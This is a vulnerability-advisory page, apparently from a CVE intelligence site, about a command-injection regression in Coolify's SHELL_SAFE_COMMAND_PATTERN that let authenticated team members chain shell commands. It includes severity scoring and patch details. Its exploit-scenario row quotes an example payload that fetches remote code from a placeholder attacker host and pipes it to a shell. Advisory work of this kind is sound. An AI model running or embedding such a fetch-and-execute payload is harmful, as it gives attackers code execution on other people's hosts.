Severity by source
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Network-reachable UI/API with only authenticated team-member access (PR:L) and no user interaction; injected command yields full host code execution, giving high C/I/A.
Primary rating from Vendor (GitHub_M).
CVSS VectorVendor: GitHub_M
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
3DescriptionCVE.org
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. From 4.0.0-beta.471 through 4.0.0-beta.473, a regression in SHELL_SAFE_COMMAND_PATTERN allowed ampersands in custom Docker Compose build, start, and pre/post-deployment command fields, allowing an authenticated team member to inject shell commands that execute on the host. This issue is fixed in version 4.0.0-beta.474.
Articles & Coverage 1
AnalysisAI
OS command injection in Coolify (self-hosted server/app/database management platform) versions 4.0.0-beta.471 through 4.0.0-beta.473 lets an authenticated team member run arbitrary shell commands on the underlying host. A regression weakened the SHELL_SAFE_COMMAND_PATTERN allowlist so that ampersands were permitted in custom Docker Compose build, start, and pre/post-deployment command fields, enabling command chaining. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires an authenticated Coolify account that is a member of a team/project with permission to edit the custom Docker Compose build, start, or pre/post-deployment command fields, and the target instance must be running an affected build (4.0.0-beta.471-4.0.0-beta.473) where the regressed SHELL_SAFE_COMMAND_PATTERN accepts ampersands. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H, base 8.8) indicates network-reachable, low-complexity exploitation requiring only low privileges (an authenticated team member) with no user interaction and full CIA impact - consistent with host-level command execution. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated user with team access to a Coolify project edits a custom Docker Compose build or pre/post-deployment command field, appending an ampersand-chained payload such as `& curl attacker/x | sh` that the regressed allowlist now permits. On the next deployment the injected command runs on the managed host with Coolify's execution privileges, giving the attacker code execution and a foothold over other hosted workloads. … |
| Remediation | Vendor-released patch: upgrade to Coolify 4.0.0-beta.474 (https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.474), which restores the correct SHELL_SAFE_COMMAND_PATTERN via PR #9684 (https://github.com/coollabsio/coolify/pull/9684) and commit e1aac50b745cf499e710b7e35cd2a9d6a1538dd9. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
24 hours: Identify all Coolify deployments running versions 4.0.0-beta.471 through 4.0.0-beta.473 and restrict administrative access to trusted personnel only. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-78 – OS Command Injection
View allSame technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41955